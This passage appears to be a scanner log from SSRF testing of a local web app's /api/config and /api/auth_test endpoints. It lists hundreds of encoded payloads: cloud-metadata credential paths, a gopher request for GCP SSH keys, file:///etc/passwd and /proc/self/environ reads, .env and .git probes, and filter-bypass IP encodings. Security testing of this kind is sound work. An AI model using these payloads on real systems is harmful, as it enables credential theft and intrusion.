`http://localhost:4200/api/config?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/config?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/config?url=localtest.me` +- Testing: `http://localhost:4200/api/config?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/config?url=127.127.127.127` +- Testing: `http://localhost:4200/api/config?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/config?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/config?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/config?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/config?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/config?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/config?url=0x7f000001` +- Testing: `http://localhost:4200/api/config?url=017700000001` +- Testing: `http://localhost:4200/api/config?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/config?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/config?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/config?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/config?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/config?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/config?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/config?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/config?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/config?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254` +- Testing: `http://localhost:4200/api/config?url=2852039166` +- Testing: `http://localhost:4200/api/config?url=7147006462` +- Testing: `http://localhost:4200/api/config?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/config?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/config?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/config?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/config?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/config?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/config?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/config?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/config?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/config?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/config?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/config?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/config?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/config?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/config?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/config?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/config?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/config?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/config?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/config?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/config?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/config?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/config?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/config?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/config?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/config?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/config?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/config?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/config?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/config?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/config?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/config?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/config?url=127.0.0.0` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/config?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/config?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/config?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/config?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/config?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/config?url=3232235521` +- Testing: `http://localhost:4200/api/config?url=3232235777` +- Testing: `http://localhost:4200/api/config?url=425.510.425.510` +- Testing: `http://localhost:4200/api/config?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/config?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/config?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/config?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/config?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/config?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/config?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/config?url=instance-data` +- Testing: `http://localhost:4200/api/config?url=localhost%3A22` +- Testing: `http://localhost:4200/api/config?url=localhost%3A443` +- Testing: `http://localhost:4200/api/config?url=localhost%3A80` +- Testing: `http://localhost:4200/api/config?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/config?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/config?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/config?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/config?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/config?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/config?url=loopback` +- Testing: `http://localhost:4200/api/config?url=loopback%3A22` +- Testing: `http://localhost:4200/api/config?url=loopback%3A80` +- Testing: `http://localhost:4200/api/config?url=loopback%3A443` +- Testing: `http://localhost:4200/api/config?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/config?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/config?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/config?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/config?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/config?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/config?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/config?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/config?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/config?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/config?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/config?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/config?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/config?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/config?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/config?url=127.1%3A80` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/config?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/config?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/config?url=2130706433%2F` +- Testing: `http://localhost:4200/api/config?url=3232235521%2F` +- Testing: `http://localhost:4200/api/config?url=3232235777%2F` +- Testing: `http://localhost:4200/api/config?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/config?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/config?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/config?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/config?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/config?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/config?url=0%2F` +- Testing: `http://localhost:4200/api/config?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/auth_test +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/auth_test?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/auth_test?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/auth_test?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/auth_test?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/auth_test?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/auth_test?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/auth_test?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/auth_test?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/auth_test?url=127.1%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=0` +- Testing: `http://localhost:4200/api/auth_test?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/auth_test?url=127.127.127.127` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.1.3` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.0` +- Testing: `http://localhost:4200/api/auth_test?url=2130706433` +- Testing: `http://localhost:4200/api/auth_test?url=017700000001` +- Testing: `http://localhost:4200/api/auth_test?url=0x7f000001` +- Testing: `http://localhost:4200/api/auth_test?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/auth_test?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=` +- Testing: `http://localhost:4200/api/auth_test?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/auth_test?url=` +- Testing: `http://localhost:4200/api/auth_test?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/auth_test?url=google.com.localhost` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/auth_test?url=` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=localtest.me` +- Testing: `http://localhost:4200/api/auth_test?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/auth_test?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/auth_test?url=2130706433%2F` +- Testing: `http://localhost:4200/api/auth_test?url=3232235521%2F` +- Testing: `http://localhost:4200/api/auth_test?url=3232235777%2F` +- Testing: `http://localhost:4200/api/auth_test?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/auth_test?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/auth_test?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/auth_test?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/auth_test?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/auth_test?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/auth_test?url=0%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.1` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=localtest.me` +- Testing: `http://localhost:4200/api/auth_test?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/auth_test?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/auth_test?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/auth_test?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/auth_test?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/auth_test?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/auth_test?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/auth_test?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/auth_test?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.1.3` +- Testing: `http://localhost:4200/api/auth_test?url=0` +- Testing: `http://localhost:4200/api/auth_test?url=127.1` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=localhost` +- Testing: `http://localhost:4200/api/auth_test?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/auth_test?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/auth_test?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/auth_test?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/auth_test?url=7F000001` +- Testing: `http://localhost:4200/api/auth_test?url=2130706433` +- Testing: `http://localhost:4200/api/auth_test?url=6425673729` +- Testing: `http://localhost:4200/api/auth_test?url=127001` +- Testing: `http://localhost:4200/api/auth_test?url=127_0._0_1` +- Testing: `http://localhost:4200/api/auth_test?url=0000%3A%3A1` +- Testing: 